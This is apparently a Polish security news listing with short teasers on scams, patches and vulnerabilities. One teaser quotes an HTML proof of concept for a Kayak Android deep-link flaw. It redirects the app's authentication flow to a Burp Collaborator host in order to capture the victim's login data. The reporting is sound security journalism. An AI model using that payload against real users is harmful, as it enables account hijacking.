Tak zaczyna się wpis Jakuba Sikorskiego na LinkedIn. Sam scam przebiegał wg schematu jaki wielokrotnie opisywaliśmy – na przykład: Pani Marianna też zainteresowała się reklamą na Facebooku. Kliknęła, wypełniła potrzebne dokumenty. Skontaktował się ze mną pan (…), pytając, czy słyszałam kiedyś o kryptowalucie bitcoin. Logo wydawało mi się podobne do tego,…
Czytaj dalej »
Tutaj krótka analiza użycia algorytmu PBKDF2 w Bitwardenie. W skrócie – odpowiednie użycie PBKDF2 znacznie zwiększa czas łamania głównego hasła do menadżera, w przypadku gdyby doszło do hipotetycznego ataku na jego infrastrukturę IT (podobnie jak miało to miejsce w przypadku LastPass). Ale żeby wszystko działało zgodnie z zamierzeniami, potrzebna jest…
Czytaj dalej »
Coś jest na rzeczy, bo Rockstar wystosował właśnie pewnego rodzaju oświadczenie na Twitterze: potential new exploits, ale zamierzamy je rozwiązać w „planowanej aktualizacji bezpieczeństwa”. No to potencjalne, czy nie? ;-) Zaczęło się najprawdopodobniej od tego wątku: Może to oznaczać możliwość zdalnego dostępu do konta ofiary i spowodowanie np. zabanowania tego…
Czytaj dalej »
W skrócie – warto jak najszybciej przejść na wersję iOS 16.3. Mamy tu całkiem sporą liczbę poprawek bezpieczeństwa, w tym korektę dwóch błędów umożliwiających wykonanie kodu na telefonie (RCE) po odwiedzeniu zainfekowanej strony webowej: Processing maliciously crafted web content may lead to arbitrary code execution. Warto też zaznaczyć, że Apple…
Czytaj dalej »
Aktualizacja 23.01.2023 21:32, po dalszym kontakcie z CSIRT KNF oraz CERT Polska, udało się ustalić, że SMS został wysłany przez bank pomyłkowo, a numer 800 777 000 należy do banku PKO BP. Nie jest to więc próba scamu. Z drugiej strony, numer infolinii, który nie widnieje nigdzie na stronie banku,…
Czytaj dalej »
Stosunkowo mocno techniczny opis podatności w MS Teamsach (wersja desktopowa): The deeplink handler for /l/task/:appId in Microsoft Teams can load an arbitrary url in webview/iframe. Attacker can leaverage this with teams RPC’s functionality to get code execution outside the sandbox. W skrócie – klikasz w linka na Teamsach, odpala on…
Czytaj dalej »
Nowa funkcja jest obecnie w wersji beta i budzi na tyle duże zainteresowanie, że obecnie wchodząc na serwis https://canarytokens.org/generate i wybierając wygenerowanie numeru karty kredytowej, możemy spotkać się z takim komunikatem: Jeśli z kolei już się uda, otrzymamy tego typu numer: W założeniu mogę wygenerować dużą liczbę takich kart, autoryzacja…
Czytaj dalej »
Firma znana chyba przede wszystkim z hitu League of Legends poinformowała o incydencie na Twitterze: Poza tym, że użyto socjotechniki, niewiele więcej wiemy o incydencie. Warto jednak przypomnieć relatywnie niedawną akcję z kradzieżą kodów źródłowych Electronic Arts. W tym ostatnim przypadku historia była prosta (i również polegała na zaprzęgnięciu socjo):…
Czytaj dalej »
Parę miesięcy temu pisaliśmy o ciekawej podatności w appce mobilnej Tiktoka, a teraz świeżo załatana podatność w appce serwisu Kayak. Idąc od końca – wystarczyło podrzucić ofierze linka do strony, na której hostowany był tego typu exploicik (specyficznie przygotowany link): <!DOCTYPE html> <html> <body> <a id=”exploit” href=”jakis_intent://externalAuthentication#Intent;scheme=kayak;package=com.kayak.android;component=com.kayak.android.web.ExternalAuthLoginActivity;action=android.intent.action.VIEW;S.ExternalAuthLoginActivity.EXTRA_REDIRECT_URL=https://jsfl9yn414bp1z2sujwfjsj3ruxlla.burpcollaborator.net;end”>Exploit</a>; </body> </html> Jeśli…
Czytaj dalej »
Świeży mini case study, o którym poinformował nas czytelnik: Gdzie prowadzi ten wpis? Na pierwszy rzut oka wygląda, że do polsatnews.pl. Jeśli przypatrzycie się zrzutowi powyżej – nie ma tam żadnej literówki. Jeśli klikniecie w linka, wylądujecie… ze sporym prawdopodobieństwem na (prawdziwej) stronie www.polsatnews.pl Gdzie więc tutaj jest scam? W…
Czytaj dalej »
Jeden z czytelników przesłał nam dzisiaj rano takie zdjęcie: Z ciekawostek – tutaj lokalizacja tego miejsca na Google Street View: Gdzie prowadzi QR kod? Do adresu: drive.proton[.]me (usługa storage cloudowego od Protona). Tam z kolei plik .doc: oświadczenie_o_cudzoziemcach_przebywających_w_rp.doc wyglądający mniej więcej tak: Czy plik jest złośliwy? Wygląda na to, że…
Czytaj dalej »
Dyskusja dookoła tego tematu – tutaj. Historia obrazkowa w trzech częściach poniżej: Po kliknięciu w pierwszy wynik Googla, za pierwszym razem rzeczywiście u mnie pojawiał się efekt widoczny poniżej (kolejne próby – inne wyniki – to uwaga dla osób, które chcą sprawdzić problem własnoręcznie). Czy powyższy content został wygenerowany przez…
Czytaj dalej »
Dla odważnych – link do scamu: hxxps://www.facebook[.]com/Camping455/ Facebookowe tłumaczenie opisu do posta na j. polski jest dość kulawe, ale generalnie oszustom chodzi o to, żeby wpisać 'Gotowe’ w komentarzu. No więc w komentarzach mamy odmianę 'Gotowe’ z całego świata. Co się dzieje po kliknięciu przycisku 'Zarejestruj się’? Jesteśmy kierowani na…
Czytaj dalej »
Wersja clickbaitowa: „dzięki WiFi można widzieć przez ściany„. No dobra, przez ściany nie można widzieć z wykorzystaniem WiFi, ale być może osiągnięcie tego celu jest blisko. Pod koniec zeszłego roku pokazano drona, który jest w stanie „widzieć” urządzenia WiFi, które znajdują się za ścianą budynku. „Widzieć”, w sensie wskazać ich…
Czytaj dalej »
Ciekawa podatność, za którą Google wypłacił $13337. Jeśli wczytacie się w opis problemu, to w zasadzie… nie ma tam żadnego hackingu. Badacz zaczął od prób dobicia się (z poziomu Internetu) do pewnego adresu IP Googla, ale nieskutecznie. Na drodze stawał ekran logowania (Google Proxy). Żadna próba obejścia nie działała, a…
Czytaj dalej »